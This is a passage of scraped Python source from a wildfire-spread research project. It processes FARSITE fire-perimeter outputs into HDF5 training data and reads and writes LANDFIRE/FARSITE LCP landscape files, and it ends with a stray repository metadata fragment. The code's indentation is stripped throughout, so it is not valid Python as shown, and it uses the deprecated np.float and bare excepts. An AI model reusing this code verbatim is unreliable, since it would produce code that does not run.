shapes = ((geom,value) for geom, value in zip(data.iloc[:ind,:].geometry, np.zeros((data.iloc[:ind,:].shape[0],),dtype=np.int16)+value)) #dataOut.iloc[:i+1,:].time))
raster = np.array(features.rasterize(shapes=shapes, fill=1, out=outArr, transform=tF)).copy()
return raster
def parseMoistures(moistures):
fm, m1h, m10h, m100h, lhm, lwm = np.median(moistures,axis=0)
return m1h, m10h, m100h, lhm, lwm
def makeConstImage(sz,value):
img = np.zeros(sz)+value
return img
def remapFuelImg(img):
modelIndexDict = bp.determineFastestModel()
fuelModelsIdx = bp.buildFuelModelsIdx()
sz = img.shape
imgRs = img.reshape((sz[0]*sz[1],))
imgStr = fuelModelsIdx[imgRs]
imgRsNew = [modelIndexDict[x] for x in imgStr]
imgNew = np.reshape(imgRsNew,(sz[0],sz[1]))
return imgNew
def visualizeFarsiteResult(namespace,lcpNamespace,perimeterOnly=True):
moistures, weathers, winds = parseFarsiteInput(namespace+'.input')
windSpeed = np.median(winds[:,3])
windDir = np.median(winds[:,4])
windX,windY = convertVector(windSpeed,windDir)
m1h, m10h, m100h, lhm, lwm = parseMoistures(moistures)
fs = 16
interval = int(np.ceil(1000/30))
dataOut = loadFarsiteOutput(namespace)
lcpData = loadFarsiteLcp(inDir+lcpNamespace)
fig = plotTimeContour(lcpData,1,dataOut,namespace+'_p.png')
plt.close()
if not perimeterOnly:
elevImg = np.array(lcpData.read(1),dtype=np.float32)
elevImg = elevImg-np.median(elevImg)
fuelImg = lcpData.read(4)
canopyImg = np.array(lcpData.read(5),dtype=np.float32)/100
canopyHeightImg = np.array(lcpData.read(6),dtype=np.float32)/10
canopyBaseHeightImg = np.array(lcpData.read(7),dtype=np.float32)/10
canopyDensityImg = np.array(lcpData.read(8),dtype=np.float32)/100
sz = elevImg.shape
elevImg = downsampleImage(elevImg,interval)
fuelImg = downsampleImage(fuelImg,interval)
canopyImg = downsampleImage(canopyImg,interval)
canopyHeightImg = downsampleImage(canopyHeightImg,interval)
canopyBaseHeightImg = downsampleImage(canopyBaseHeightImg,interval)
canopyDensityImg = downsampleImage(canopyDensityImg,interval)
fuelImg = remapFuelImg(fuelImg)
smallSz = elevImg.shape
windXImg = makeConstImage(smallSz,windX)
windYImg = makeConstImage(smallSz,windY)
lhmImg = makeConstImage(smallSz,lhm)
lwmImg = makeConstImage(smallSz,lwm)
m1hImg = makeConstImage(smallSz,m1h)
m10hImg = makeConstImage(smallSz,m10h)
m100hImg = makeConstImage(smallSz,m100h)
t = dataOut['time']
tOff = 6
tF = lcpData.transform
clims = [[0,1],[-250,250],
[-20,20],[-20,20],
[30,150],[30,150],
[0,40],[0,40],
[0,40],[0,1],
[0,20],[0,20],
[0,0.4],
[0,52],
[0,1],[0,1]]
names = ['Input Fire','Input Elev',
'Input WindX','Input WindY',
'Live Herb M','Live Wood M',
'Moisture 1-h','Moisture 10-h',
'Moisture 100-h','Canopy Cover',
'Canopy Height','Canopy Base Height',
'Canopy Density',
'model',
'Network','Truth']
(t.max()-t.min())/tOff
for i in range(0,t.max(),tOff):
""" This is how command line farsite outputs
"""
try:
startInd = np.argwhere(t-i>=0)[0][0]
endInd = np.argwhere(t-i>=tOff)[0][0]
currentFire = getRasterFromPolygon(dataOut,tF,startInd,1,sz)
nextFire = getRasterFromPolygon(dataOut,tF,endInd,1,sz)
currentFire = downsampleImage(currentFire,interval)
nextFire = downsampleImage(nextFire,interval)
data = [currentFire,elevImg,windXImg,windYImg,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,canopyDensityImg,fuelImg,nextFire,nextFire]
plotWildfireData(data,names,clims=clims,saveFig=True,saveName=namespace+'_'+str(i)+'_'+str(i+tOff)+'_summary.png')
except:
pass
def generateBurnMap(inDir,lcpNamespace,namespace):
rst = rasterio.open(inDir+lcpNamespace)
meta = rst.meta.copy()
meta.update(driver='GTiff')
meta.update(count=1)
meta.update(nodata=255)
meta.update(crs="EPSG:3759")
meta.update(dtype='uint8')
dataOut = loadFarsiteOutput(namespace)
dataOut = dataOut.reindex(index=dataOut.index[::-1])
with rasterio.open(outDir+namespace.split(inDir)[1]+'.tif','w', **meta) as out:
out_arr = out.read(1)
# this is where we create a generator of geom, value pairs to use in rasterizing
shapes = ((geom,value) for geom, value in zip(dataOut.geometry, dataOut.time))
burned = features.rasterize(shapes=shapes, fill=100, out=out_arr, transform=out.transform)
out.write_band(1, burned)
def _float_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
#def _int64_feature(value):
# return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def writeConstH5(name,elevImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,fuelImg):
    hf = h5py.File(name, 'w')  # use the passed-in path rather than the module-level outDir+constsName
hf.create_dataset('elevation',data=elevImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyCover',data=canopyImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyHeight',data=canopyHeightImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyBaseHeight',data=canopyBaseHeightImg,compression="gzip",compression_opts=9) # or /canopyHeightImg
hf.create_dataset('fuelModel',data=fuelImg,compression="gzip",compression_opts=9)
hf.close()
def writeSpecH5(specName,pointData,inputBurnmap,outputBurnmap,constsName):
hf = h5py.File(specName,'w')
hf.create_dataset('pointData',data=pointData,compression="gzip",compression_opts=9)
hf.create_dataset('inputBurnmap',data=inputBurnmap,compression="gzip",compression_opts=9)
hf.create_dataset('outputBurnmap',data=outputBurnmap,compression="gzip",compression_opts=9)
hf.create_dataset('constsName',data=bytes(constsName,'utf-8'),dtype=h5py.special_dtype(vlen=bytes))
hf.close()
def readSpecH5(specName):
hf = h5py.File(specName,'r')
pointData = hf.get('pointData')
inputBurnmap = np.array(hf.get('inputBurnmap'),dtype=np.float)
outputBurnmap = np.array(hf.get('outputBurnmap'),dtype=np.float)
constsName = hf.get('constsName').value.decode('utf-8')
[windX,windY,lhm,lwm,m1h,m10h,m100h] = pointData
hf.close()
hf = h5py.File(specName.split('run_')[0]+constsName,'r')
elev = np.array(hf.get('elevation'),dtype=np.float)
canopyCover = np.array(hf.get('canopyCover'),dtype=np.float)
canopyHeight = np.array(hf.get('canopyHeight'),dtype=np.float)
canopyBaseHeight = np.array(hf.get('canopyBaseHeight'),dtype=np.float)
fuelModel = np.array(hf.get('fuelModel'),dtype=np.float)
data = np.zeros((elev.shape[0],elev.shape[1],13))
data[:,:,0] = inputBurnmap
data[:,:,1] = elev
data[:,:,2] = windX
data[:,:,3] = windY
data[:,:,4] = lhm
data[:,:,5] = lwm
data[:,:,6] = m1h
data[:,:,7] = m10h
data[:,:,8] = m100h
data[:,:,9] = canopyCover
data[:,:,10] = canopyHeight
data[:,:,11] = canopyBaseHeight
data[:,:,12] = fuelModel
return data, outputBurnmap
if __name__ == "__main__":
commandFile = 'commonDir/farsite/example/Panther/runPanther.txt'
inDir = 'E:/projects/wildfire-research/farsite/data/'
outDir = 'E:/projects/wildfire-research/farsite/results/'
inputNames = ['Current Fire','Elevation','Current WindX','Current WindY','Live Herb M','Live Wood M','Moisture 1-h','Moisture 10-h','Moisture 100-h','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
files = glob.glob(inDir+"run_*_*_*_*_*_*_Perimeters.shp")
print("Total files: %.0f"%(len(files)))
#assert False, "Stopped"
for i in range(1060,len(files)):#file in files:
try:
#i = -1
file = files[i]
#file = inDir[:-1]+'\\'+'run_0_8_n116-9499_38-9950_25000_out_Perimeters.shp'
namespace = file.split('\\')[1].split('_out_Perimeters.shp')[0]
outNamespace = outDir+namespace+'_p.png'
namespace = inDir+namespace
lcpNamespace = namespace.split('_')[3]+'_'+namespace.split('_')[4]+'_'+namespace.split('_')[5]+'.LCP'
if len(glob.glob(outDir+namespace.split(inDir)[1]+'.tif'))==0:
#generateBurnMap(inDir,lcpNamespace,namespace)
#assert False, "Stopped"
pass
else:
interval = 6
burnmapData = rasterio.open(outDir+namespace.split(inDir)[1]+'.tif')
burnmap = np.array(burnmapData.read_band(1),dtype=np.float)
rInd = int(burnmap.shape[0]/2)
cInd = int(burnmap.shape[1]/2)
burnmap[rInd-2:rInd+2,cInd-2:cInd+2] = -1
maxBurnTime = np.max(burnmap[burnmap <= 200].max())
maxBurnSteps = int(maxBurnTime/interval)
burnmaps = np.zeros((burnmap.shape[0],burnmap.shape[1],maxBurnSteps),dtype=np.float)
for i in range(0,maxBurnSteps):
burnTime = float(i*interval)
burnTemp = burnmap.copy()
burnTemp[burnTemp < burnTime] = -1
burnTemp[burnTemp >= burnTime] = 0
burnTemp[burnTemp == -1] = 1
burnmaps[:,:,i] = burnTemp
#print("Found %s"%(outDir+namespace.split(inDir)[1]+'.tif'))
lcpData = loadFarsiteLcp(inDir+lcpNamespace)
elevImg = np.array(lcpData.read(1),dtype=np.float32)
elevImg = elevImg-np.median(elevImg)
fuelImg = lcpData.read(4)
canopyImg = np.array(lcpData.read(5),dtype=np.float32)/100
canopyHeightImg = np.array(lcpData.read(6),dtype=np.float32)/10
canopyBaseHeightImg = np.array(lcpData.read(7),dtype=np.float32)/10
canopyDensityImg = np.array(lcpData.read(8),dtype=np.float32)/100
sz = elevImg.shape
plt.imshow(burnmaps[:,:,-1])
moistures, weathers, winds = parseFarsiteInput(namespace+'.input')
windSpeed = np.median(winds[:,3])
windDir = np.median(winds[:,4])
windX,windY = convertVector(windSpeed,windDir)
m1h, m10h, m100h, lhm, lwm = parseMoistures(moistures)
sz = elevImg.shape
fuelImg = remapFuelImg(fuelImg)
smallSz = elevImg.shape
#writer = tf.python_io.TFRecordWriter('train.tfrecords')
constsName = lcpNamespace.split('.LCP')[0]+'.h5'
if len(glob.glob('%s%s'%(outDir,constsName))) == 0:
writeConstH5(outDir+constsName,elevImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,fuelImg)
for i in range(0,maxBurnSteps-1):
pointData = np.array([windX,windY,lhm,lwm,m1h,m10h,m100h])
inputBurnmap = np.array(burnmaps[:,:,i],dtype=np.float)
outputBurnmap = np.array(burnmaps[:,:,i+1],dtype=np.float)
specName = outDir+namespace.split(inDir)[1]+'_%0.0f.h5'%(i)
writeSpecH5(specName,pointData,inputBurnmap,outputBurnmap,constsName)
#feature = {'train/label': _int64_feature(np.array(data[:,:,-1],dtype=np.int64).flatten()),
# 'train/image': _float_feature(np.array(data[:,:,:-1]).flatten())}
#example = tf.train.Example(features=tf.train.Features(feature=feature))
#writer.write(example.SerializeToString())
#writer.close()
sys.stdout.flush()
except:
print("Failed: %s"%(file))
```
#### File: datadriven-wildfire-spread/scripts/vegetationTools.py
```python
import matplotlib.pyplot as plt
import osgeo.gdal
import numpy as np
import struct
import matplotlib.path as mpltPath
from collections import defaultdict
import os
def getHistogram(file):
img = osgeo.gdal.Open(file)
band = np.array(img.ReadAsArray(),dtype=np.float32)
return band
def parseLcpHeader(header):
headerDict = dict()
headerDict['nX'] = header[1037]; headerDict['nY'] = header[1038]
headerDict['eastUtm'] = header[1039]; headerDict['westUtm'] = header[1040]
headerDict['northUtm'] = header[1041]; headerDict['southUtm'] = header[1042]
headerDict['gridUnits'] = header[1043];
headerDict['xResol'] = header[1044]; headerDict['yResol'] = header[1045];
headerDict['eUnits'] = header[1046]; headerDict['sUnits'] = header[1047];
headerDict['aUnits'] = header[1048]; headerDict['fOptions'] = header[1049];
headerDict['cUnits'] = header[1050]; headerDict['hUnits'] = header[1051];
headerDict['bUnits'] = header[1052]; headerDict['pUnits'] = header[1053];
headerDict['dUnits'] = header[1054]; headerDict['wUnits'] = header[1055];
headerDict['elevFile'] = header[1056]; headerDict['slopeFile'] = header[1057];
headerDict['aspectFile'] = header[1058]; headerDict['fuelFile'] = header[1059];
headerDict['coverFile'] = header[1060]; headerDict['heightFile'] = header[1061];
headerDict['baseFile'] = header[1062]; headerDict['densityFile'] = header[1063];
headerDict['duffFile'] = header[1064]; headerDict['woodyFile'] = header[1065];
headerDict['description'] = header[1066]
return headerDict
def readLcpFile(filename):
with open(filename,'rb') as f:
data = f.read()
dataFormat = '=llldddd'
for i in range(0,10):
dataFormat = dataFormat+'lll%.0fl'%(100)
dataFormat = dataFormat+'llddddlddhhhhhhhhhh256s256s256s256s256s256s256s256s256s256s512s'
los = []
his = []
nums = []
values = []
names = []
header = struct.unpack(dataFormat,data[:7316])
header2 = parseLcpHeader(header)
crownFuels = header[0]; groundFuels = header[1]; latitude = header[2];
loEast = header[3]; hiEast = header[4]
loNorth = header[5]; hiNorth = header[6]
loElev = header[7]; hiElev = header[8]; numElev = header[9]; elevationValues = header[10:110]; los.append(loElev); his.append(hiElev); nums.append(numElev); values.append(elevationValues); names.append('Elevation')
loSlope = header[110]; hiSlope = header[111]; numSlope = header[112]; slopeValues = header[113:213]; los.append(loSlope); his.append(hiSlope); nums.append(numSlope); values.append(slopeValues); names.append('Slope')
loAspect = header[213]; hiAspect = header[214]; numAspect = header[215]; aspectValues = header[216:316]; los.append(loAspect); his.append(hiAspect); nums.append(numAspect); values.append(aspectValues); names.append('Aspect')
loFuel = header[316]; hiFuel = header[317]; numFuel = header[318]; fuelValues = header[319:419]; los.append(loFuel); his.append(hiFuel); nums.append(numFuel); values.append(fuelValues); names.append('Fuel')
loCover = header[419]; hiCover = header[420]; numCover = header[421]; coverValues = header[422:522]; los.append(loCover); his.append(hiCover); nums.append(numCover); values.append(coverValues); names.append('Cover')
if crownFuels == 21 and groundFuels == 21:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 10
elif crownFuels == 21 and groundFuels == 20:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
numImgs = 8
elif crownFuels == 20 and groundFuels == 21:
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 7
else:
numImgs = 5
nX = header[1037]; nY = header[1038]
eastUtm = header[1039]; westUtm = header[1040]
northUtm = header[1041]; southUtm = header[1042]
gridUnits = header[1043];
xResol = header[1044]; yResol = header[1045];
eUnits = header[1046]; sUnits = header[1047];
aUnits = header[1048]; fOptions = header[1049];
cUnits = header[1050]; hUnits = header[1051];
bUnits = header[1052]; pUnits = header[1053];
dUnits = header[1054]; wUnits = header[1055];
elevFile = header[1056]; slopeFile = header[1057];
aspectFile = header[1058]; fuelFile = header[1059];
coverFile = header[1060]; heightFile = header[1061];
baseFile = header[1062]; densityFile = header[1063];
duffFile = header[1064]; woodyFile = header[1065];
description = header[1066]
bodyFormat = ''
for i in range(0,numImgs):
bodyFormat = bodyFormat+'%.0fh'%(nX*nY)
body = np.array(struct.unpack(bodyFormat,data[7316:]))
imgs = np.split(body,numImgs)
for i in range(0,numImgs):
img = body[i::numImgs]
img = np.array(img,dtype=np.float32)
img[img == -9999] = np.nan
imgs[i] = np.reshape(img,(nY,nX),order='C')
return imgs, names, header
def checkPoint(query,polygon=[[-125,42],[-122,34],[-112,36],[-114.5,44]]):
path = mpltPath.Path(polygon)
inside = path.contains_points(query)[0]
return inside
def getHeaderInfo(data):
_,idx = np.unique(data.flatten(),return_index=True)
values = data.flatten()[np.sort(idx)]
if len(values) > 100:
values = values[0:100]
values[-1] = data.flatten()[-1]
num = -1
else:
num = len(values)
tmpData = np.zeros((100,))
tmpData[1:num+1] = np.sort(values)
values = tmpData
values = np.array(values,dtype=np.int16)
lo = int(data[data>-9999].min())
hi = int(data.max())
header = struct.pack('=lll100l',lo,hi,num,*values)
return header, lo, hi, num, values
def generateLcpFile_v2(datas, headers, names, lat=43.0,
gridUnits=0,
eUnits=0,
sUnits=0,
aUnits=2,
fOptions=0,
cUnits=1,
hUnits=3,
bUnits=3,
pUnits=1,
dUnits=0,
wUnits=0):
if datas is not None and headers is not None and names is not None:
sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
crownFuels = 21 if len(datas[1]) > 0 else 20
groundFuels = 21 if len(datas[2]) > 0 else 20
latitude = lat
nCols = sH[0]
nRows = sH[1]
westUtm = sH[2]
southUtm = sH[3]
xResol = sH[4]
yResol = sH[4]
eastUtm = westUtm + xResol*nCols
northUtm = southUtm + yResol*nRows
loEast = westUtm - round(westUtm,-3)
hiEast = loEast + xResol*nCols
loNorth = southUtm - round(southUtm,-3)
hiNorth = loNorth + yResol*nRows
dataFormat = '=llldddd'
header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
for i in range(0,5):
data = datas[0][i]
name = names[0][i]
if 'US_ASP2010' in name:
data[data < 0] = -9999
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
if crownFuels == 21:
for data in datas[1]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
if groundFuels == 21:
for data in datas[2]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header+struct.pack('=ll',int(nCols),int(nRows))
header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
#print("Base five names:")
for name in names[0]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
if crownFuels == 21:
#print("crownFuel names:")
for name in names[1]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
if groundFuels == 21:
#print("groundFuel names:")
for name in names[2]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
description = 'Automatically generated.'
header = header + struct.pack('=512s',str.encode(description))
imgSize = int(nCols*nRows)
numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
totalSize = int(imgSize*numImgs)
allImgs = np.zeros((totalSize))
ct = 0
for data in datas[0]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[1]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[2]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
allImgs = np.array(allImgs,dtype=np.int16)
dataFormat = '=%.0fh'%(totalSize)
body = struct.pack(dataFormat,*allImgs)
return header+body
def queryLandfireFile(file, queryPoint=None, resolution=1500, buildMesh=False):
dataset = osgeo.gdal.Open(file)
band = dataset.GetRasterBand(1)
cols = dataset.RasterXSize
rows = dataset.RasterYSize
transform = dataset.GetGeoTransform()
xOrigin = transform[0]
yOrigin = transform[3]
pixelWidth = transform[1]
pixelHeight = transform[5]
xMax = xOrigin + pixelWidth*cols
yMax = yOrigin + pixelHeight*rows
if queryPoint is None:
queryPoint = ((xOrigin+xMax)/2, (yOrigin+yMax)/2)
x = np.linspace(xOrigin, xMax, int((xMax-xOrigin)/pixelWidth+1))
y = np.linspace(yOrigin, yMax, int((yMax-yOrigin)/pixelHeight+1))
xind = np.argmin(abs(x-queryPoint[0]))
yind = np.argmin(abs(y-queryPoint[1]))
xind01 = int(xind-int((resolution/2)))
yind01 = int(yind-int((resolution/2)))
data = band.ReadAsArray(xind01, yind01, resolution, resolution)
if (data.dtype == np.int16):
data = np.array(data, np.float)
data[data == -9999] = np.nan
else:
data = np.array(data, np.float)
noDataValue = band.GetNoDataValue()
data[np.isclose(data, noDataValue)] = np.nan
if buildMesh:
xind02 = int(xind+int((resolution/2)))
yind02 = int(yind+int((resolution/2)))
xData = x[xind01:xind02]
yData = y[yind01:yind02]
xGrid, yGrid = np.meshgrid(xData, yData)
else:
xGrid = False
yGrid = False
return data, xGrid, yGrid
def getLandfireWkt():
nad83_wkt = """
PROJCS["USA_Contiguous_Albers_Equal_Area_Conic_USGS_version",
GEOGCS["NAD83",
DATUM["North_American_Datum_1983",
SPHEROID["GRS 1980",6378137,298.2572221010042,
AUTHORITY["EPSG","7019"]],
AUTHORITY["EPSG","6269"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4269"]],
PROJECTION["Albers_Conic_Equal_Area"],
PARAMETER["standard_parallel_1",29.5],
PARAMETER["standard_parallel_2",45.5],
PARAMETER["latitude_of_center",23],
PARAMETER["longitude_of_center",-96],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]"""
cs = osgeo.gdal.osr.SpatialReference()
cs.ImportFromWkt(nad83_wkt)
return cs
def getModisWkt():
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
cs = osgeo.gdal.osr.SpatialReference()
cs.ImportFromWkt(wgs84_wkt)
return cs
def getTransformLandfireToModis():
old_cs = getLandfireWkt()
new_cs = getModisWkt()
transform = osgeo.gdal.osr.CoordinateTransformation(old_cs,new_cs)
return transform
def getTransformModisToLandfire():
new_cs = getLandfireWkt()
old_cs = getModisWkt()
transform = osgeo.gdal.osr.CoordinateTransformation(old_cs,new_cs)
return transform
if __name__ == "__main__":
###########################################################################
# USER INPUTS
###########################################################################
# Data naming
prefix = "us_"
yearStr = "130"
indir = "G:\\WildfireResearch\\landfireData\\"
names = ['Canopy Base Height', 'Canopy Base Density', 'Canopy Height',
'Canopy Cover', 'Fuel Model 13', 'Fuel Model 40',
'Aspect', 'Elevation', 'Slope']
ids = ['cbh', 'cbd', 'ch', 'cc', 'fbfm13', 'fbfm40', 'asp_2016', 'dem_2016', 'slpd_2016']
# Output options
resolution = 1000
#queryPoint = np.array([-2144805, 1565987, 0.0], dtype=np.float) # Same point in meters
queryPoint = np.array([-121.896571, 38.030451, 0.0], dtype=np.float) # Same point in degrees
queryPoint = np.array([-116.680072, 32.808536, 0.0], dtype=np.float) # Same point in degrees
queryPointUnits = 'degree' # either degree or meter
axisType = 'kilometer' # either degree, meter, or kilometer
displayType = 'contour' # either contour or image
###########################################################################
# END USER INPUTS
###########################################################################
# Example transformation from LANDFIRE coordinate system to standard latitude/longitude
if queryPointUnits == 'meter':
transform1 = getTransformLandfireToModis()
qp_lon, qp_lat, _ = transform1.TransformPoint(queryPoint[0], queryPoint[1], queryPoint[2])
qp = queryPoint
elif queryPointUnits == 'degree':
transform1 = getTransformLandfireToModis()
transform2 = getTransformModisToLandfire()
qp_x, qp_y, qp_z = transform2.TransformPoint(queryPoint[0], queryPoint[1], queryPoint[2])
qp = np.array([qp_x, qp_y, qp_z], dtype=np.float)
# Initialize parameters for looping over data queries
datas = defaultdict(bool)
buildMesh = True
# Read rest of data query
for i in range(0, len(ids)):
did = ids[i]
file = "%s%s%s%sGrid%s%s%s%sw001000.adf"%(indir, prefix, did, os.sep, os.sep, prefix, did, os.sep)
if not os.path.exists(file):
file = "%s%s%s%s%sGrid2%s%s%s%s%sw001000.adf"%(indir, prefix, yearStr, did, os.sep, os.sep, prefix, yearStr, did, os.sep)
if not os.path.exists(file):
print("Unable to find file: %s"%(file))
print(file)
data, tmp1, tmp2 = queryLandfireFile(file, queryPoint=qp, resolution=resolution, buildMesh=buildMesh)
if buildMesh:
# Only build grid on first data query
(xGrid, yGrid) = (tmp1, tmp2)
buildMesh = False
datas[names[i]] = data
# Build latitude and longitude arrays if plotting in degrees
if axisType == 'degree':
sz = xGrid.shape
xGrid_rs = np.reshape(xGrid,(xGrid.shape[0]*xGrid.shape[1],))
yGrid_rs = np.reshape(yGrid,(yGrid.shape[0]*yGrid.shape[1],))
points = np.array([xGrid_rs,yGrid_rs]).T
latlong = np.array(transform1.TransformPoints(points))
lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
# Visualize data
totR = 3
totC = 3
fs = 16
fig, ax = plt.subplots(totR, totC, figsize=(18,12))
for i in range(0, len(ids)):
plotC = (i % totC)
plotR = int((i-(i % totC))/totC)
if (axisType == 'degree') and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('Longitude $\mathrm{(^{\circ})}$', fontsize=fs)
ax[plotR][plotC].set_ylabel('Latitude $\mathrm{(^{\circ})}$', fontsize=fs)
(xPlot, yPlot, decimals) = (lon, lat, 2)
elif axisType == 'meter' and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('X-Position (m)', fontsize=fs)
ax[plotR][plotC].set_ylabel('Y-Position (m)', fontsize=fs)
(xPlot, yPlot, decimals) = (xGrid, yGrid, 0)
elif axisType == 'kilometer' and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('X-Position (km)', fontsize=fs)
ax[plotR][plotC].set_ylabel('Y-Position (km)', fontsize=fs)
(xPlot, yPlot, decimals) = (xGrid/1000, yGrid/1000, 1)
else:
(xPlot, yPlot, decimals) = (xGrid, yGrid, 0)
(xmn, xmx, xavg) = (xPlot.min(), xPlot.max(), (xPlot.max() + xPlot.min())/2)
(ymn, ymx, yavg) = (yPlot.min(), yPlot.max(), (yPlot.max() + yPlot.min())/2)
(xmn, xmx, xavg) = (np.round(xmn, decimals), np.round(xmx, decimals), np.round(xavg, decimals))
(ymn, ymx, yavg) = (np.round(ymn, decimals), np.round(ymx, decimals), np.round(yavg, decimals))
if displayType == 'contour':
im = ax[plotR][plotC].contourf(xPlot, yPlot, datas[names[i]], 25, cmap='jet_r')
ax[plotR][plotC].set_xticks([xmn, xavg, xmx])
ax[plotR][plotC].set_yticks([ymn, yavg, ymx])
ax[plotR][plotC].tick_params(labelsize=fs)
cbar = plt.colorbar(im, ax=ax[plotR][plotC])
ticklabs = cbar.ax.get_yticklabels()
cbar.ax.set_yticklabels(ticklabs, fontsize=fs)
elif displayType == 'image':
im = ax[plotR][plotC].imshow(datas[names[i]], cmap='jet_r')
ax[plotR][plotC].set_title(names[i], fontsize=fs)
ax[plotR][plotC].ticklabel_format(useOffset=False, style='plain')
plt.tight_layout()
plt.show()
# Build LCP file for FARSITE
dictNames1 = ['Elevation', 'Slope', 'Aspect', 'Fuel Model 40', 'Canopy Cover']
lcpNames1 = ['Elevation', 'Slope', 'Aspect', 'Fuel', 'Cover']
dictNames2 = ['Canopy Height', 'Canopy Base Height', 'Canopy Base Density']
lcpNames2 = ['Canopy Height', 'Canopy Base Height', 'Canopy Density']
imgs1 = []
for dictName, lcpName in zip(dictNames1, lcpNames1):
imgs1.append(np.array(datas[dictName], dtype=np.int16))
imgs2 = []
for dictName, lcpName in zip(dictNames2, lcpNames2):
imgs2.append(np.array(datas[dictName], dtype=np.int16))
nCols = imgs1[0].shape[1]
nRows = imgs1[0].shape[0]
xll = xGrid.min()
yll = yGrid.min()
fileDx = xGrid[0,1]-xGrid[0,0]
headers = []
for name in lcpNames1:
header = ['ncols %.0f\n'%(nCols),
'nrows %.0f\n'%(nRows),
'xllcorner %.12f\n'%(xll),
'yllcorner %.12f\n'%(yll),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(0)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
headers.append(stringHeader)
text = generateLcpFile_v2([imgs1, imgs2, []], headers, [lcpNames1, lcpNames2, []])
with open('test.LCP', 'wb') as f:
f.write(text)
imgs, names, header = readLcpFile("test.LCP")
``` |
{
"source": "johodges/pyfdstools",
"score": 2
} |
#### File: johodges/pyfdstools/examples.py
```python
